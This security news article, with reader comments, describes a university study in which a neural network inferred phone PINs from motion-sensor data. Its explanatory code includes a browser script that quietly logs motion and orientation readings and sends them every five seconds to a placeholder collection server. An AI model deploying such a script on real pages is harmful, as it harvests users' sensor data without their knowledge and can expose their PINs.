The motion sensors embedded in smartphones could offer attackers a way to infer security PINs, researchers at Newcastle University have discovered.
Today’s smartphones come stuffed with these sensors, ranging from well-known ones such as the GPS, camera, microphone and fingerprint reader to accelerometers, gyroscopes, ambient light sensors, magnetometers, proximity sensors, barometers, thermometers and air humidity sensors – to name only a few of the estimated 25 in the best-equipped models.
That’s a lot of data for a rogue app or malicious website to target, and much of it is not covered by any consistent permissions or notification system.
The Newcastle University study focused on the sensors that record a device’s orientation, motion and rotation, which, the team theorised, could be used to reveal specific touch actions.
The methodology involved 10 smartphone users entering 50 four-digit test PINs five times each on a webpage, which provided data to train the neural network used to guess the PINs.
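To get a sense of how little access that requires, here is a minimal sketch (in TypeScript, targeting the browser) of the kind of collection script such a webpage could run. The devicemotion and deviceorientation events are the standard W3C APIs for these sensors; the sample format, the recording logic and the collection URL are illustrative assumptions, not the researchers’ actual code.

    // Minimal sketch: a web page logging motion and orientation sensor
    // data. In 2017-era browsers, no permission prompt was required.
    interface SensorSample {
      t: number;            // timestamp in ms
      ax: number | null;    // acceleration (incl. gravity), x/y/z
      ay: number | null;
      az: number | null;
      alpha: number | null; // device rotation in degrees
      beta: number | null;
      gamma: number | null;
    }

    const samples: SensorSample[] = [];
    let orientation: Pick<SensorSample, 'alpha' | 'beta' | 'gamma'> =
      { alpha: null, beta: null, gamma: null };

    window.addEventListener('deviceorientation', (e: DeviceOrientationEvent) => {
      orientation = { alpha: e.alpha, beta: e.beta, gamma: e.gamma };
    });

    window.addEventListener('devicemotion', (e: DeviceMotionEvent) => {
      const a = e.accelerationIncludingGravity;
      samples.push({
        t: Date.now(),
        ax: a?.x ?? null,
        ay: a?.y ?? null,
        az: a?.z ?? null,
        ...orientation,
      });
    });

    // Every few seconds, ship the captured samples to a collection server
    // (hypothetical URL) to build up the neural network's training set.
    setInterval(() => {
      if (samples.length === 0) return;
      fetch('https://collector.example/motion', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(samples.splice(0)),
      });
    }, 5000);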
In the event, the network guessed the correct PIN on its first try an impressive 70% of the time. By the fifth guess, the success rate reached 100%.
For comparison, the team reckons a random guess would have been right only 2% of the time on the first attempt and 6% of the time within three guesses – the test PINs came from a fixed set of 50, so each blind guess had a 1-in-50 chance.
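The arithmetic behind that baseline is easy to verify – with a pool of 50 equally likely PINs, k distinct guesses succeed with probability k/50:

    // Chance that k distinct random guesses from a pool of n equally
    // likely PINs include the right one (sampling without replacement).
    const randomGuessSuccess = (k: number, n: number): number => k / n;

    console.log(randomGuessSuccess(1, 50)); // 0.02 -> 2% on the first guess
    console.log(randomGuessSuccess(3, 50)); // 0.06 -> 6% within three guesses
    // Compare the trained network: 70% first time, 100% by the fifth guess.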
That’s an impressive guessing rate – so should smartphone users be worried?
In the short term, not really. Training the neural network to reach this level of accuracy required a large amount of training data – 250 PIN entries per targeted user (the 50 test PINs, five times each) – on which to base its inferences about which keys individuals had touched.
Gathering each of those PINs could only be achieved under specific conditions, such as if an attacker were running a rogue app or had lured the user to a website running malicious JavaScript code in a tab that remained open while they entered a PIN in another site.
Under real-world conditions this would be pretty hard to pull off. In any case, the team points out, up to a quarter of smartphone users choose PINs from a predictable set of 20 common sequences such as 1234, 0000, or 1000, so advanced neural PIN guessing might be overkill.
What the study tells us is that how someone holds, clicks, scrolls and taps on a smartphone generates data that is not as indecipherable or random as people probably think it is.
Said the study’s lead author, Dr Maryam Mehrnezhad:
“We all clamour for the latest phone with the latest features and better user experience, but because there is no uniform way of managing sensors across the industry, they pose a real threat to our personal security.”
One solution would be to extend sensor permissions so that users can see when a malicious site or app is accessing them. But there are now so many sensors inside smartphones that this might lead to notification overload.
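For what it’s worth, here is a sketch of what permission-gated motion access looks like to a web page. The DeviceMotionEvent.requestPermission() call is a real gate of this kind (iOS Safari added it in version 13); the feature detection, the logging callback and the #enable-motion button are illustrative assumptions.

    // Sketch: asking before listening. Browsers without the gate simply
    // deliver the events, so we feature-detect before prompting.
    async function startMotionLogging(): Promise<void> {
      // Cast to any: requestPermission is absent from some TS DOM typings.
      const dme = DeviceMotionEvent as any;
      if (typeof dme.requestPermission === 'function') {
        // Must be called from a user gesture; the browser shows a prompt.
        const state: string = await dme.requestPermission();
        if (state !== 'granted') return;
      }
      window.addEventListener('devicemotion', (e: DeviceMotionEvent) => {
        console.log(e.accelerationIncludingGravity);
      });
    }

    // Tie the request to an explicit tap, as the permission model demands.
    document.querySelector('#enable-motion')?.addEventListener('click', () => {
      startMotionLogging();
    });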
The team’s other suggestions – change PINs regularly, check app permissions before installation, close background tabs and apps – are sound, but unlikely to make much of an impression on the average smartphone user if the history of security advice is anything to go by.
Alternatively, people could simply use longer PINs or, better still, the industry could ditch them altogether (as is being done elsewhere) in favour of better security options. Users like PINs, but as the punchline goes, their days are surely numbered.
Anonymous
I’m sure this is of academic interest, but if some attack program is already running on your device, it probably doesn’t need your PIN.
Paul Ducklin
Yes and no.
The idea here is to take low-security data that (say) a web page or an already-installed app can access without any special permissions, and use that data to infer high-security data such as a PIN or other password.
Even if you aren’t able to do this with a web page and need to get someone to install your “attack program”, you’re much more likely to persuade them to trust your app if it asks for modest (or no) special permissions.
In particular, it’s always going to be a security vulnerability if an app that explicitly says it won’t access your keyboard, and indeed doesn’t access it directly, can nevertheless figure out what you typed anyway – and without arousing any suspicion.
This is an example of EoP, short for Elevation of Privilege:
https://nakedsecurity.sophos.com/2013/09/18/sophos-techknow-understanding-vulnerabilties-podcast/
jkwilborn
Interesting. I always wonder when they say “better security options” and the link only tells you about the IRS ditching its PIN system. Nothing about ‘better security options’, which is why I followed the link… :)
In the US, I believe we have a problem: the courts have already ruled that you have ‘no right’ to refuse to be fingerprinted, on the grounds that fingerprints are physical characteristics – like your looks, you can’t really change them. Somewhere between this and DNA availability lies the warrant/no-warrant line. This means that phone access via fingerprint allows them to force me to open it – likewise for phones that use facial or retina mechanisms. Unless I were to allow only digital (numbers, not fingers) access.